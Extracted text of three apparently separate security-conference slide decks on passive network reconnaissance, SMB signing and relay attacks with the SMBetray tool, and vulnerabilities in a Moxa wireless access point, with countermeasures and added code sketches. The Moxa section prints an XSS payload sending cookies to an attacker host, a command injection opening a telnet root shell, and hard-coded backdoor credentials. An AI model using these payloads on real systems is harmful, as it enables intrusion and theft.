PIG: Finding Truffles Without Leaving A Trace Ryan Linn DEFCON 19 Copyright Trustwave 2010 Overview •  Introduction •  Why are we here ? •  How will this help me ? •  Talking is boring show me •  That’s neat, how does this work ? •  Protocols and Plugins •  Remediation Copyright Trustwave 2010 Introduction Ryan Linn / Senior Security Consultant at Trustwave •  Member of SpiderLabs team at Trustwave •  Contributor to Metasploit, BeEF, and other open source projects •  Interests: •  Process streamlining through tool integration, sharing knowledge, Metasploit, making security knowledge accessible •  Twitter: @sussurro •  Web: www.happypacket.net Copyright Trustwave 2010 Why are we here ? Passive Network Information Gathering •  Identify hosts/resources on a network •  Profile individuals/applications •  Determine network architecture •  Machine/domain/individual naming schemes Completely Silent •  No IP address required •  No Man-In-The-Middle required Copyright Trustwave 2010 Why are we here ? •  Understand what is on your network •  Deep Packet Parsing sounds like fun •  Make this information easier for everyone to access •  How to leverage this for pen tests •  Waiting here for the next talk.. Copyright Trustwave 2010 How will this help me? SysAdmin/User •  Know what traffic you are transmitting •  Are you tipping your hand by just being on the network ? Pen Tester •  Understand what information you can use to profile a network without anyone knowing you’re there Everyone •  Make this process easier •  Use Metasploit Database to help process/manage data •  Organize and manage results with Dradis •  How to stay quiet on a network Copyright Trustwave 2010 Talking is boring, show me Demo Time •  Demo 1 – Gathering Data •  Use Metasploit PIG modules to parse traffic and save data to the database •  Demo 2 – Viewing data with Metasploit •  Use Metasploit msfconsole to view collected data •  Demo 3 – Using Dradis to view information •  Import Metasploit data into Dradis to view data •  Demo 4 – PWN Plug and PIG Copyright Trustwave 2010 That’s neat, how does this work Metasploit framework plugin •  Core auxiliary module that handles sniffing Helper filters •  Series of individual filters that handle protocol parsing •  Each protocol sets sniffing parameters so that not everything goes to every filter Let’s take a look •  Demo time − Look at structure of building a simple parser Copyright Trustwave 2010 Dig Deeper Currently supported filters •  CDP •  DHCP Inform •  Dropbox •  Groove •  MDNS •  SMB •  SSDP Copyright Trustwave 2010 Dig Deeper CDP / Cisco Discovery Protocol •  OS Version •  IP address information •  VLAN Information •  Management Interface information •  VOIP vlans •  Can aid in VLAN Hopping Copyright Trustwave 2010 Dig Deeper DHCP Inform •  Not completed yet, but •  Will pull out: − Mac address − Hostname − Vendor class − Request list •  Together can be used to guess OS and Service Pack Copyright Trustwave 2010 Dig Deeper Dropbox •  Easily identify hosts using Dropbox •  Dropbox version •  Dropbox port •  Shared namespaces Copyright Trustwave 2010 Dig Deeper Groove •  Online/Offline status •  Groove Port •  All addresses on the system − Can be used to identify boxes with VMs, link hosts together •  Groove Version Copyright Trustwave 2010 Dig Deeper MDNS •  One of most interesting •  List open ports •  IP Addresses •  Peoples Names •  Active State of Machine •  Available Functionality Copyright Trustwave 2010 Dig Deeper SMB •  Host OS Version •  Server/Client Status •  Hostname •  
Domain Name •  SQL Server ? Copyright Trustwave 2010 Dig Deeper SSDP / Simple Service Discovery Protocol (UPNP) •  AKA Network Plug and Play •  Printers •  Cameras •  Network Gateways Copyright Trustwave 2010 How do we fix it Netbios •  Disable Netbios over TCP SSDP •  Disable network plug and play CDP •  Enable it only where needed DHCP •  DHCP Helpers can limit where these packets go Dropbox •  Disable LAN Sync Groove •  Haven’t found a way MDNS •  Disable it when possible, may not always be an option Copyright Trustwave 2010 How to help Need more data •  Broadcast and Multicast traffic only DHCP Host ID More protocols Copyright Trustwave 2010 Future Add functionality to Meterpreter •  Meterpreter has sniffing capabilities, work on post module More protocols •  Collect data •  ??? •  Profit Better OS ID •  Improve guessing with DHCP Copyright Trustwave 2010 Resources Code •  http://www.happypacket.net/Defcon2011.tgz Metasploit •  http://www.metasploit.org Book •  Coding for Pen Testers comes out in Oct! Copyright Trustwave 2010 Questions Thanks for attending Thanks to DEFCON staff If you want to talk more head to follow-up room
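The core idea is easy to approximate outside Metasploit as well. Below is a small stand-alone Scapy sketch — not the PIG modules themselves — that passively listens for the same broadcast/multicast protocols the filters above parse and notes which hosts are talking; nothing is ever transmitted.

from collections import defaultdict
from scapy.all import sniff, Ether, IP, UDP

# UDP ports of some of the chatty protocols PIG parses (not exhaustive).
INTERESTING = {5353: "mDNS", 1900: "SSDP", 137: "NetBIOS-NS", 138: "NetBIOS-DGM",
               67: "DHCP", 68: "DHCP", 17500: "Dropbox LAN sync"}

seen = defaultdict(set)

def handle(pkt):
    if not (pkt.haslayer(Ether) and pkt.haslayer(IP) and pkt.haslayer(UDP)):
        return
    proto = INTERESTING.get(pkt[UDP].dport) or INTERESTING.get(pkt[UDP].sport)
    if proto and proto not in seen[(pkt[IP].src, pkt[Ether].src)]:
        seen[(pkt[IP].src, pkt[Ether].src)].add(proto)
        print(pkt[IP].src, "(" + pkt[Ether].src + ") speaks", proto)

# Broadcast/multicast only -- the sniffer itself stays completely silent.
sniff(filter="broadcast or multicast", prn=handle, store=False)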
quickbreach@defcon26:~# ./smbetray.py --help Backdooring & Breaking Signatures William Martin (@QuickBreach) > whoami • William Martin • OSCP • Penetration Tester • Supervisor at RSM US LLP in Charlotte, NC • Second time presenting at DEFCON • Twitter: @QuickBreach > Who is this talk for? • Red teamers looking to learn more about Active Directory, SMB security, and pick up new attacks against insecure SMB connections • Blue teamers that want to stop the red teamers from using what they learn • Anyone curious about how SMB signing actually works > Overview • Brief recap on what SMB is • NTLMv2 Relay attack • Investigate what SMB signing actually is • How else we can attack SMB? • Introduce SMBetray • Demo & tool release • Countermeasures • Credits Recap on SMB SMB server = Any PC receiving the SMB connection, not necessarily a Windows Server OS. Eg, a Windows 7 box can be the SMB server, as every Windows OS runs an SMB server by default SMB client = The PC/Server connecting to the SMB server > Terminology clarification > Recap on SMB (Source: https://docs.microsoft.com/en-us/windows/desktop/fileio/microsoft-smb-protocol-and-cifs-protocol- overview) > Recap on SMB SMB listens on TCP port 445 and allows for file sharing and management over the network, with features including: • Mapping network drives • Reading & writing files to shares • Authentication support • Providing access to MSRPC named pipes > What is SMB? > Recap on SMB Attackers love it for: • Pass-the-hash • System enumeration (authenticated, or null sessions) • Spidering shares & hunting for sensitive data, such as for the cpassword key in SYSVOL xml files > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB What is SMB signing? > What is SMB signing? > What is SMB signing? > What is SMB signing? > What is SMB signing? > What is SMB signing? What I knew in the beginning: • Protects the integrity of SMB messages between the client and server, preventing any tampering • Is required by default on all domain controllers • Occurs after authenticated session setup • Stops my favorite attack > What is SMB signing? Lessons were learned – core concepts: At the end of the authentication phase in an authenticated session, the client and server will possess the same 16-byte SessionBaseKey. Depending on the dialect, the client and server may use this SessionBaseKey to generate subsequent keys each purposed for specific actions such as signing and encrypting SMB packets. Only those in possession of the keys can generate the appropriate signatures. > Sample signature > What is SMB signing? So, where does this SessionBaseKey come from – especially if we can manipulate the entire authentication process? Answer: The creation of the SessionBaseKey depends on the authentication mechanism used. > A walk through the NTLMv2 process > NTLMSSP Negotiate “Hello, I want to authenticate using NTLM” • No username/password/domain information in message • “Negotiate Key Exchange” is usually set. This means after the client authenticates and generates a SessionBaseKey, the client will generate a new random one, RC4 encrypt it with the old one, and send it to the server to use going forward. 
> NTLMSSP Challenge “Cool, hash your password & other data with this challenge” Contains: • Server challenge • Server information > NTLMSSP AUTH (Challenge-Response) “Sure, here’s everything” Contains: • Client username • Client domain • Client challenge • NtProofString • ResponseServerVersion • HiResponseServerVersion • A Timestamp (aTime) • Encrypted new SessionBaseKey (Probably) Great…so how is the SessionBaseKey generated? > First – A Brief HMAC/CMAC Refresher HMACs are keyed-hash message authentication code algorithms. Only those in possession of the private key, and the data, can generate the appropriate hash. These are used to verify the integrity of a message. CMACs are similar to HMACs with the exception that they’re based on cipher block algorithms like AES rather than hashing algorithms like MD5. Message = “Pineapple belongs on pizza” SecretKey = “IwillDieOnThisHill” HMAC_MD5(SecretKey, Message) = “34c5092a819022f7b98e51d3906ee7df” > SessionBaseKey Generation Let’s generate the SessionBaseKey from an NTLMv2 authentication process Step #1: NTResponse = HMAC_MD5(User’s NT Hash, username + domain) > SessionBaseKey Generation Step #2: basicData = serverChallenge + responseServerVersion + hiResponseServerVersion + '\x00' * 6 + aTime + clientChallenge + '\x00' * 4 + serverInfo + '\x00' * 4 NtProofString = HMAC_MD5(NTResponse, basicData) > SessionBaseKey Generation Step #3 (Last Step): SessionBaseKey = HMAC_MD5(NTResponse, NtProofString) > SessionBaseKey Generation Put together: NTResponse = HMAC_MD5(User’s NT Hash, username + domain) basicData = serverChallenge + responseServerVersion + hiResponseServerVersion + '\x00' * 6 + aTime + clientChallenge + '\x00' * 4 + serverInfo + '\x00' * 4 NtProofString = HMAC_MD5(NTResponse, basicData) SessionBaseKey = HMAC_MD5(NTResponse, NtProofString) So what information do we NOT have? > SessionBaseKey Generation Put together: NTResponse = HMAC_MD5(User’s NT Hash, username + domain) basicData = serverChallenge + responseServerVersion + hiResponseServerVersion + '\x00' * 6 + aTime + clientChallenge + '\x00' * 4 + serverInfo + '\x00' * 4 NtProofString = HMAC_MD5(NTResponse, basicData) SessionBaseKey = HMAC_MD5(NTResponse, NtProofString) NTLM key logic: User’s password -> Users’ NT Hash -> (Combined with challenge & auth data) -> SMB SessionBaseKey If the user’s password is known, SMB signatures can be forged > SessionBaseKey Generation > SessionBaseKey Generation If “Negotiate Key Exchange” is set, then the client generates an entirely random new SessionBaseKey, RC4 encrypts it with the original SessionBaseKey, and sends it in the NTLMSS_AUTH request in the “SessionKey” field. NTLM key logic with “Negotiate Key Exchange” : User’s password -> Users’ NT Hash -> (Combined with challenge & auth data) -> SMB SessionBaseKey -> SMB Exchanged SessionKey (becomes new SessionBaseKey) > SessionBaseKey Generation To fill in the blanks from the NTLMv2 relay attack presented earlier > The (now obvious) missing piece of the puzzle The DC takes in the challenge and the challenge response to generate the SessionBaseKey, and then sends it to the server through a required secure & encrypted channel. This secure channel is established by the NETLOGON service on a domain connected PC at startup, and the underlying authentication protecting it is the password for the machine account itself. > The (now obvious) missing piece of the puzzle But wait, what about Kerberos? > What about Kerberos? The SessionBaseKey is the ServiceSessionKey in the TGS response. 
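To make the key chain above concrete, here is a minimal Python sketch that follows the slides' notation. Two hedges: real NTLMv2 implementations uppercase the username and encode user+domain as UTF-16LE (done below), and the nt_hash input is MD4 of the UTF-16LE password, details the slides gloss over. Anyone who holds these inputs, that is, the user's password plus values visible on the wire, can reproduce the SessionBaseKey.

import hashlib
import hmac

def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def session_base_key(nt_hash: bytes, username: str, domain: str,
                     server_challenge: bytes, resp_version: bytes,
                     hi_resp_version: bytes, atime: bytes,
                     client_challenge: bytes, server_info: bytes) -> bytes:
    # Step 1: the per-user key ("NTResponse" in the slides). nt_hash is
    # MD4(UTF-16LE(password)); user+domain are uppercased/encoded here.
    nt_response = hmac_md5(nt_hash, (username.upper() + domain).encode("utf-16-le"))
    # Step 2: NtProofString over the challenge/response blob from the slides.
    basic_data = (server_challenge + resp_version + hi_resp_version + b"\x00" * 6 +
                  atime + client_challenge + b"\x00" * 4 + server_info + b"\x00" * 4)
    nt_proof = hmac_md5(nt_response, basic_data)
    # Step 3: the key every subsequent SMB signature hangs off of.
    return hmac_md5(nt_response, nt_proof)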
Key logic: User’s plaintext password -> Kerberos Session Key -> Service Session Key (inside TGS) > What about Kerberos? If mutual authentication is used, the server will reply with a new SessionBaseKey which is encrypted with the previous one. Key logic: User’s plaintext password -> Kerberos Session Key -> Service Session Key (inside TGS) -> New Service Session Key (inside AP_REP) > Signing the packet Once we have the SessionBaseKey, we can sign the packet SMB 1.0 Signature = HMAC_MD5(SessionBaseKey, SMBPacket) SMB 2.0.2 & 2.1.0 Only the first 16 bytes of the hash make up the signature Signature = HMAC_SHA256(SessionBaseKey, SMBPacket) SMB 3.0.0, 3.0.2 & 3.1.1 A special signing key is derived from the SessionBaseKey Signature = CMAC_AES128(SigningKey, SMBPacket) > Attacking SMB So, what happens when we know the SessionBaseKey, or when signing is not required at all per the default settings? HTTP before HTTPS > Attacking SMB > Attacking SMB - If encryption is not used • Steal copies of files passed over the wire in cleartext - If signing is not used • Replace every file with an identical LNK that executes our code • Swap out the contents of any legitimate file with our own malicious one of the same file-type • Inject fake files into directory listings (for social engineering) - If signing is used, and the attacker knows the key • All above + backdoor any logon scripts & SYSVOL data we can (Defaults) SMB1: Client supports it, server doesn’t. Unless they both support it, or one requires it, no signing will be used. (Defaults) SMB2/3: Server & client support it, but don’t require it. Unless someone requires it, signing is not used. > Attacking SMB (Defaults) SMB1: No encryption support (Defaults) SMB2/3: Encryption was introduced in SMB3 but must be manually enabled or required > Attacking SMB Non-DC Machines SMB1 Client Signing SMB1 Server Signing SMB2/3 Client Signing SMB2/3 Server Signing Highest Version Windows Vista SP1 Supported, Not required Disabled Not required Not required 2.0.2 Windows 7 Supported, Not required Disabled Not required Not required 2.1.0 Windows 8 Supported, Not required Disabled Not required Not required 3.0.0 Windows 8.1 Supported, Not required Disabled Not required Not required 3.0.2 Windows 10* Supported, Not required Disabled Not required Not required 3.1.1 Server 2008 Supported, Not required Disabled Not required Not required 2.0.2 Server 2008 R2 Supported, Not required Disabled Not required Not required 2.1.0 Server 2012 Supported, Not required Disabled Not required Not required 3.0.0 Server 2012 R2 Supported, Not required Disabled Not required Not required 3.0.2 Server 2016* Supported, Not required Disabled Not required Not required 3.1.1 - Domain controllers require SMB signing by default. - In Windows 10 and Server 2016, signing and mutual authentication (ie. Kerberos auth) is always required on \\*\SYSVOL and \\*\NETLOGON These default settings are enforced through UNC hardening > Notable Exceptions - If a client supports SMB3, and the dialect picked for the connection is SMB 2.0.2 -> 3.0.2, the client will always send a signed FSCTL_VALIDATE_NEGOTIATE_INFO message to validate the negotiated “Capabilities, Guid, SecurityMode, and Dialects” from the original negotiation phase – and require a signed response. This feature cannot be disable in Windows 10/Server 2016 and later. This prevents dialect downgrades (except to SMBv1), and stripping any signature/encryption support. > Notable Exceptions SMB 3.1.1 is a security beast. 
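Once the SessionBaseKey is known, the per-dialect signing formulas above are a few lines of code. The sketch below covers the SMB 2.0.2 / 2.1 case, plain HMAC-SHA256 truncated to 16 bytes; in a real message the 16-byte Signature field in the SMB2 header is zeroed before hashing and then overwritten with the result. The SMB3 AES-CMAC variant over a derived SigningKey is omitted because it needs a CMAC primitive from a third-party library.

import hashlib
import hmac

def smb2_sign(session_base_key: bytes, packet: bytes) -> bytes:
    # SMB 2.0.2 / 2.1 signature: HMAC-SHA256 over the packet (with the
    # header's Signature field zeroed), truncated to 16 bytes.
    return hmac.new(session_base_key, packet, hashlib.sha256).digest()[:16]

def smb2_verify(session_base_key: bytes, packet_with_sig_zeroed: bytes,
                received_sig: bytes) -> bool:
    expected = smb2_sign(session_base_key, packet_with_sig_zeroed)
    return hmac.compare_digest(expected, received_sig)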
It leverages pre-authentication integrity hashing to verify that all information prior to authentication was not modified. In a nutshell: It takes the cumulative SHA-512 hash of the every SMB packet prior to authentication, and uses it in the SessionBaseKey generation process. If any data was modified, then the client and server will not generate the same signing keys. At the end of the session setup response, both client and server must send a signed message to prove integrity. > Notable Exceptions • Signing is not used by default except on DCs, and when W10/Server2016 connect to \\*\NETLOGON and \\*\SYSVOL • Encryption is only supported in SMB 3.0.0 and greater, and must be enabled or required manually. • Every dialect up except for SMB 3.1.1 can be downgraded to NTLMv2 if it is supported. • Signing and encryption keys are, at their root, based on knowledge of the user’s password. > Recap Introducing SMBetray > Attacking SMB The goal was to build a tool to take full advantage of the gaps in security of weak SMB sessions from a true MiTM perspective. Primary objectives were to steal sensitive data, and gain RCE > SMBetray Biggest obstacle: Putting the tool in the ideal position for intercept. The ideal position was a fully transparent intercept/proxy that, when a victim routes all traffic through us, would transparently eavesdrop on the connection between the victim and their actual legitimate destination. > SMBetray Existing options provided two possibilities:* 1. Use of an arbitrary upstream server 2. Use of NFQUEUE to edit the packets at the kernel level *Note: I did not flip the Internet upside down searching for the perfect solution Use of pre-configured upstream server > SMBetray Use of a pre-configured upstream server Pros: - Connection stability Cons: - You’re most likely redirecting the requests of your victim somewhere other than where they meant to go. This causes disruptions, and doesn’t provide the true “transparent” MiTM setup desired. Once the data is re-directed through iptables, we lose the original “destination” information, so we can’t determine where the victim was originally sending the request. (HTTP MiTM servers avoid this issue by grabbing the “Host:” info from the header) Use of Kernel level NFQUEUE packet editing > SMBetray Use of a NFQUEUE Pros: - Full transparency, as packets aren’t redirected – they’re edited on the fly at the kernel level Cons: - This level of TCP packet editing takes too long (from a TCP timeout perspective). This quickly leads to TCP re-transmission snowballing, and connections resetting. Solution? Combine them > SMBetray Created ebcLib.py as a MiTM TCP proxy with the useful transparency of an NFQUEUE intercept, with the connection stability of an upstream MiTM proxy. SMBetray is built on top of this library. 
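The slides point out that a pre-configured upstream proxy loses the victim's original destination once iptables redirects the traffic. One common way a REDIRECT-based listener can recover it on Linux is the SO_ORIGINAL_DST socket option; whether ebcLib uses exactly this mechanism is an assumption, but the sketch shows the general idea: accept the redirected connection, ask the kernel where the client was really headed, and only then dial the true destination and relay.

import socket
import struct

SO_ORIGINAL_DST = 80  # constant from <linux/netfilter_ipv4.h>

def original_dst(conn: socket.socket):
    # For a TCP connection that iptables REDIRECTed to this listener,
    # return the (ip, port) the client was actually trying to reach.
    raw = conn.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16)
    port, packed_ip = struct.unpack_from("!2xH4s", raw)
    return socket.inet_ntoa(packed_ip), port

# iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-ports 8445
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", 8445))
listener.listen(16)

while True:
    client, src = listener.accept()
    dst_ip, dst_port = original_dst(client)
    print(f"{src[0]} really wanted {dst_ip}:{dst_port}")
    client.close()  # a real proxy would now connect to the true destination and relay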
Anatomy of a new connection in ebcLib.py Anatomy of an existing/established connection in ebcLib.py > SMBetray Now that we can put ourselves where we want, lets start attacking SMB SMBetray runs the below attacks: • Dialect downgrading & Authentication mechanism downgrading • Passive file copying • File directory injection • File content swapping/backdooring • Lnk Swapping • Compromise SessionKeys (if we have creds) & forge signatures SMBetray Sample SMBetray Sample SMBetray Sample SMBetray Sample Demo Github.com/QuickBreach/SMBetray.git Countermeasures > Countermeasures: Disable SMBv1 Require SMB signatures across the domain on both clients and servers by enabling “Digitally sign communications (always)” > Countermeasures: Require SMB Signing > Countermeasures: Require SMB Signing SMB 3 introduced support for encryption, which can be established on a per-share basis, or be implemented system-wide. Encryption can either be “supported”, or “required”. If an SMB 3 server supports encryption, it will encrypt any session after authentication with an SMB 3 client, but not reject any un- encrypted connection with lesser versions of SMB If an SMB 3 server requires encryption, it will reject any un- encrypted connection. > Countermeasures: Use Encryption UNC hardening is a feature available in Group Policy that allows administrators to push connection security requirements to clients if the UNC the client is connecting to matches a certain pattern. These requirements include only supporting mutual authentication, requiring SMB signing, and requiring encryption. Eg. “RequireIntegrity=1” on “\\*\NETLOGON” will ensure that, regardless of the security requirements reported by the server, the client will only connect to the NETLOGON share if signing is used. > Countermeasures: Use UNC Hardening > Countermeasures: Audit & Restrict NTLM Audit where NTLM is needed in your organization, and restrict it to those systems where it is needed. Removing, or at least restricting NTLM in the environment, will aid in preventing authentication mechanism downgrades to NTLMv1/v2 for SMB dialects less than 3.1.1. The pre- authentication integrity hash in 3.1.1 protects its authentication mechanisms, but this check only occurs after authentication – which means an attacker would have already captured the NTLMv2 hashes to crack, even though the SMB 3.1.1 connection will be terminated. > Countermeasures: Kerberos FAST Armoring > Countermeasures: Kerberos FAST Armoring Require Kerberos Flexible Authentication via Secure Tunneling (FAST) - The user’s Kerberos AS-REQ authentication is encapsulated within the machine’s TGT. This prevents an attacker who knows the user’s password from compromising that user’s Kerberos session key. This also prevents attackers from cracking AS-REP’s to compromise user passwords - This feature enables authenticated Kerberos errors, preventing KDC error spoofing from downgrading clients to NTLM or weaker cryptography. > Countermeasures: Kerberos FAST Armoring PRECAUTIONS WHEN REQUIRING FAST: Armoring requires Windows 8/2012, or later, throughout the environment. If FAST Armoring is required, and thereby set to “Fail unarmored authentication requests”, any older and non-FAST supporting devices will no longer be able to authenticate to the domain – and be dead in the water. Review documentation & your environment thoroughly before requiring this setting > Countermeasures: Passphrase not Password Push users to the passphrase from the password mindset BAD: D3fc0n26! 
GOOD: “5ome some stronger p@ssword!” If we can’t crack the password in the first place, we can’t compromise Kerberos Session Keys or SMB Session Base Keys > Contributors & Shoulders of Giants > Contributors & Shoulders of Giants Ned Pyle (@NerdPyle) Principal Program Manager in the Microsoft Windows Server High Availability and Storage Group at Microsoft - Verified authenticity of SMB protections and behaviors Mathew George Principal Software Engineer in the Windows Server Group at Microsoft - Verified authenticity of SMB protections and behaviors Special thanks to CoreSecurity for the impacket libraries > \x00 Thank you DEFCON 26! https://github.com/QuickBreach/SMBetray.git William Martin @QuickBreach
P R O T E C T I N G Y O U R N E T W O R K Patrick DeSantis | @pat_r10t FROM BOX TO BACKDOOR U s i n g O l d S c h o o l To o l s a n d Te c h n i q u e s t o D i s c o v e r B ac k doors in Modern Dev ic es Patrick DeSantis | @pat_r10t OVERVIEW INTRO: WHO, WHAT, WHY MOXA AWK3131A WAP MOXA WAP: ABOUT “The AWK-3131A is 802.11n compliant to deliver speed, range, and reliability to support even the most bandwidth-intensive applications. The 802.11n standard incorporates multiple technologies, including Spatial Multiplexing MIMO (Multi-In, Multi-Out), 20 and 40 MHz channels, and dual bands (2.4 GHz and 5 GHz) to provide high speed wireless communication, while still being able to communicate with legacy 802.11a/b/g devices. The AWK's operating temperature ranges from -25 to 60°C for standard models and -40 to 75°C for wide temperature models, and is rugged enough for all types of harsh industrial environments. Installation of the AWK is easy using DIN-Rail mounting or distribution boxes, and with its wide operating temperature range, IP30-rated housing with LED indicators, and DIN-Rail mounting it is a convenient yet reliable solution for all types of industrial wireless applications.” - Moxa MOXA WAP: ABOUT TL;DR •  It’s an 802.11n Wireless Access Point (WAP) –  in a din rail mountable enclosure –  many of the the parts inside are the same as in common SOHO networking devices •  Moxa advertises that the AWK series is –  "a Perfect Match for Your AGV & AS/RS Systems” •  Automated Guided Vehicles (AGV) •  Automated Storage and Retrieval System (AS/RS) –  common in Automated Materials Handling (AMH) systems. MOXA WAP: ABOUT •  It’s “Unbreakable” –  challenge accepted MOXA WAP: DEVICE LIMITATIONS •  Limited to about 8k connections per some unit of time –  lots of resource exhaustion DoS issues –  throttle traffic or wait for recovery •  Crashes… a lot •  No legit operating system access •  Very limited shell environment –  most management and configuration done via web app •  Crashes… A LOT –  so many crashes… –  usually needs a reboot to recover •  later, we’ll have access to crash dumps and see a lot of these crashes are seg faults (want some CVEs?) MOXA WAP: DEVICE LIMITATIONS MOXA WAP: DEVICE LIMITATIONS CVE-2016-8723 Moxa AWK-3131A HTTP GET Denial of Service Vulnerability MOXA WAP: FIRMWARE ANALYSIS MOXA WAP: FIRMWARE ANALYSIS MOXA WAP: SCAN AND ENUM 22/tcp & &open&& &ssh&Dropbear&sshd&0.53& 23/tcp & &open&& &telnet&BusyBox&telnetd& 80/tcp & &open&& &http&GoAhead&WebServer& 443/tcp& &open&& &ssl/http&GoAhead&WebServer& 5801/tcp& &open&& &Moxa&serviceAgent&(TCP)& 5800/udp& &open & &Moxa&serviceAgent&(UDP)& MOXA WAP: WEB APP MOXA WAP: WEB APP MOXA WAP: WEB APP MOXA WAP: WEB APP - NONCE •  cryptographic nonce: –  In crypto, a Number used ONCE –  Uses •  prevents replay attacks •  as a pseudo random IV •  a salt in hashing algorithms •  not the Urban Dictionary definition of nonce –  “(UK) Slang for paedophile.” (sic) MOXA WAP: WEB APP – SESSION MOXA WAP: WEB APP - FREEZE NONCE MOXA WAP: WEB APP - FREEZE NONCE CVE-2016-8712 Moxa AWK-3131A Web Application Nonce Reuse Vulnerability MOXA WAP: WEB APP - FIX SESSION •  The session token is calculated: –  token = MD5( password + nonce ) •  The device has only: –  1 user (admin) – effectively, there are no users –  1 password (default is “root”) –  1 nonce (only changes after 5 mins of inactivity) THERE IS ONLY 1 VALID SESSION TOKEN AT A TIME! 
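The token scheme just described is easy to model. The sketch below assumes the straightforward string concatenation implied by the slides, and the frozen nonce value is a made-up placeholder standing in for whatever the device keeps handing out.

import hashlib

def token(password: str, nonce: str) -> str:
    # Session token scheme from the slides: MD5(password + nonce).
    return hashlib.md5((password + nonce).encode()).hexdigest()

# With the nonce frozen (CVE-2016-8712), a single account ("admin") and a
# single password, there is only ever one valid token: a token stolen via
# the XSS never expires, and the password behind it can be brute-forced
# offline against the known nonce.
frozen_nonce = "1f2e3d4c"              # hypothetical value observed on the wire
stolen = token("root", frozen_nonce)   # "root" is the documented default password

for guess in ["admin", "password", "moxa", "root"]:
    if token(guess, frozen_nonce) == stolen:
        print("admin password recovered:", guess)
        break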
MOXA WAP: WEB APP - XSS MOXA WAP: WEB APP - XSS •  /client_list.asp&[devIndex&parameter]& –  devIndex=bikf4"><script>alert(document.cookie)<%2fscript>ej77g& •  /multiple_ssid_set.asp&[devIndex&parameter]& –  devIndex=wireless_cert.asp? index=bikf4"><script>alert(document.cookie)<%2fscript>ej77g& •  /wireless_cert.asp&[index&parameter]& –  wireless_cert.asp? index=bikf4"><script>alert(document.cookie)<%2fscript>ej77g& •  /wireless_security.asp&[vapIndex&parameter]& –  vapIndex=bikf4"><script>alert(document.cookie)<%2fscript>ej77g& CVE-2016-8719 Moxa AWK-3131A Web Application Multiple Reflected Cross-Site Scripting Vulnerabilities MOXA WAP: WEB APP - XSS MOXA WAP: WEB APP - XSS & http://<device&IP>/wireless_cert.asp?index=? index=%22%3E%3Cscript%3Ewindow.location=%22http ://<attacker&ip>/test? cookie=%22.concat%28document.cookie%29%3C/ script%3E& MOXA WAP: WEB APP - XSS MOXA WAP: WEB APP - XSS •  We have –  user name (hardcoded) –  nonce (frozen) –  session token (stolen cookie) •  We can easily crack password –  it’s just MD5( password + nonce ) •  But, we don’t need the password –  the nonce isn’t changing –  our session token will never become invalid MOXA WAP: SESSION HIJACK MOXA WAP: WEB APP – OS CMD INJ CVE-2016-8721 Moxa AWK-3131A Web Application Ping Command Injection Vulnerability MOXA WAP: WEB APP – OS CMD INJ ;&/bin/busybox&telnetd&-l/bin/sh&-p9999& MOXA WAP: WEB APP – OS CMD INJ MOXA WAP: GET BINARIES MOXA WAP: WEB APP - CSRF cve MOXA WAP: WEB APP - CSRF MOXA WAP: BACKDOOR q  94jo3dkru4:Zg5SOmmQKk3kA:0:0:root:/:/bin/sh& & q  daccli:$1$$oCLuEVgI1iAqOA8pwkzAg1:0:0:root:/:/usr/sbin/daccli& & q  netdump:x:34:34:Network&Crash&Dump&user:/var/crash:/bin/bash& & q  mysql:x:27:27:MySQL&Server:/var/lib/mysql:/bin/bash& & q  admin:ZH0m6QMdLV0Wo:0:0:root:/:/usr/sbin/iw_console& & q  art::0:0:art&calibration:/:/etc/art_shell.sh& MOXA WAP: BACKDOOR ü  94jo3dkru4:Zg5SOmmQKk3kA:0:0:root:/:/bin/sh& & q  daccli:$1$$oCLuEVgI1iAqOA8pwkzAg1:0:0:root:/:/usr/sbin/daccli& & q  netdump:x:34:34:Network&Crash&Dump&user:/var/crash:/bin/bash& & q  mysql:x:27:27:MySQL&Server:/var/lib/mysql:/bin/bash& & q  admin:ZH0m6QMdLV0Wo:0:0:root:/:/usr/sbin/iw_console& & q  art::0:0:art&calibration:/:/etc/art_shell.sh& MOXA WAP: BACKDOOR MOXA WAP: BACKDOOR MOXA WAP: BACKDOOR & $&strings&iw_doConfig&|&grep&moxa& …&<snip>&…& echo&"94jo3dkru4:moxaiw%s"&|&/sbin/chpasswd& /bin/passwd&-u&94jo3dkru4&-p&"moxaiw%s"& MOXA WAP: BACKDOOR MOXA WAP: BACKDOOR •  Sets admin user’s password –  We know admin password is “root” •  Sets 94jo3dkru4 user’s password –  Doesn’t change the value being passed to %s –  “moxaiw%s” becomes “moxaiwroot” •  This is hard-coded in an initialization binary –  runs every time the device boots MOXA WAP: BACKDOOR MOXA WAP: BACKDOOR We have an operating system root-level backdoor!!! CVE-2016-8717 Moxa AWK-3131A Hard-coded Administrator Credentials Vulnerability MOXA WAP: BACKDOOR & iw_system((int32_t)"iw_onekey&%s&&");& iw_system((int32_t)"killall&-2&%s");& iw_system((int32_t)"ping&-c&4&%s&1>/var/pingtestlog.txt&2>&1");& & iw_system((int32_t)"openssl&aes-256-cbc&-d&-k&moxaiwroot& -salt&-in&%s&-out&%s");& & iw_system((int32_t)"rm&%s");& iw_system((int32_t)"echo&Import&Fail&>&%s");& iw_system((int32_t)"touch&%s%s");& iw_system((int32_t)"cd&%s&&&&tftp&-p&-r&%s&%s&&&&echo&$?&>&%s");& iw_system((int32_t)"echo&\"TFTP&Server&no&response\"&>&%s");& iw_system((int32_t)"rm&%s%s");& MOXA WAP: ATTACK SUMMARY Freeze Nonce XSS Session Hijack CSRF Command Injection Busybox Telnet Root Backdoor MOXA WAP: NOW WHAT? 
•  We already have OS root
•  It's a "read-only" file system
•  We already grabbed all the binaries and configs
•  We could install a backdoor – but it already has one
•  Lots of binaries already on device can be used to do fun things
MOXA WAP: NOW WHAT?
[Slide content: a multi-column directory listing of the BusyBox applets and Moxa-specific binaries present on the device, among them dropbear, telnetd, tcpdump, iptables, ebtables, openssl, wget, tftp, fw_printenv/fw_setenv, hostapd, wpa_supplicant and the various iw_* utilities; the listing was garbled by PDF extraction and is reduced here to this placeholder.]
MOXA WAP: NOW WHAT?
